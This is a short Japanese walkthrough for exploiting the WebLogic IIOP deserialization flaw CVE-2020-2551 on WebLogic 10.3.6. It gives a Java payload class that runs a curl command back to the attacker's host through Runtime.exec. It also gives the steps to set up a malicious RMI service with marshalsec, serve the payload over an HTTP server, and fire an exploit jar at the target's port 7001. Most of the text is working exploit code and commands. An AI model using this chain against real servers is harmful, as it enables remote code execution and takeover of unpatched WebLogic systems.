
Weblogic IIOP CVE-2020-2551
Weblogic IIOP 逆シリアル化
Weblogic10.3.6+jdk1.6
パッケージ化されたjarファイル 抽出コード:a6ob
jarファイルをダウンロードし、marshalsecを使用して悪意のあるRMIサービスを起動します。ローカルでexp.javaをコンパイルします。
package payload;
import java.io.IOException;
public class exp {
public exp() {
String cmd = "curl http://172.16.1.1/success";
try {
Runtime.getRuntime().exec(cmd).getInputStream();
} catch (IOException e) {
e.printStackTrace();
}
}
}
WebLogicと同じJDKバージョンと依存ライブラリ(wlfullclient.jar)を使用してコンパイルすることを推奨します その後、ローカルでWebサーバーを起動します。
python -m http.server --bind 0.0.0.0 80
コマンドラインでjarファイルを実行します
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
実際の動作は以下の通りです

多くの方が再現に失敗したと報告しています。ネット上の記事を見ると、IIOPにはNATモードの問題があることがわかりました。本日、先知(Xianzhi)に https://xz.aliyun.com/t/7498 が掲載されましたので、各自ご確認ください。